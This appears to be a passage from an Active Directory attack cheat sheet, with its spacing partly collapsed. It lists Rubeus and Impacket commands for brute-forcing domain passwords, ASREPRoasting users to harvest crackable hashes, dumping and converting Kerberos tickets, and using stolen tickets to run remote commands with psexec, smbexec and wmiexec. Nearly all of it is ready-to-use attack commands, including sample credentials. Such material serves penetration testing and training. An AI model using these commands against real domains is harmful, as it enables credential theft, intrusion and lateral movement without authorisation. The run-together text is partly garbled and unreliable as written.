# with a list of users.\Rubeus.exebrute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exebrute/passwords:<passwords_file>/outfile:<output_file>
# check ASREPRoast for all domain users (credentials required)pythonGetNPUsers.py<domain_name>/<domain_user>:<domain_user_password>-request-format<AS_REP_responses_format [hashcat |john]> -outputfile<output_AS_REP_responses_file>python3GetNPUsers.pyCOMPANY.local/james:Password123-request-formatjohn-outputfile/home/ubuntu/Documents/file/dir/asrep.out-dc-ip172.16.1.20# check ASREPRoast for a list of users (no credentials required)pythonGetNPUsers.py<domain_name>/-usersfile<users_file>-format<AS_REP_responses_format [hashcat |john]> -outputfile<output_AS_REP_responses_file>
# check ASREPRoast for all users in current domain.\Rubeus.exeasreproast/format:<AS_REP_responses_format [hashcat |john]> /outfile:<output_hashes_file>
The structure of an SPN consists of three (3) main parts: Service Class: the service type, i.e., SQL, Web, Exchange, File, etc., and the Host where the service is usually running in the format of FQDN (Fully Qualified Domain Name)and port number.
For example, below, the Microsoft SQL service runs on the dcorp-mgmt host on port 1443.
The SPN is MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
📌HackTricks Tip:If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronize the host with the DC: ntpdate <IP of DC>
.\Rubeusdump# After dump with Rubeus tickets in base64, to write the in a file[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
# Set the ticket for impacket useexport KRB5CCNAME=<TGT_ccache_file_path># Execute remote commands with any of the following by using the TGTpythonpsexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonsmbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpythonwmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass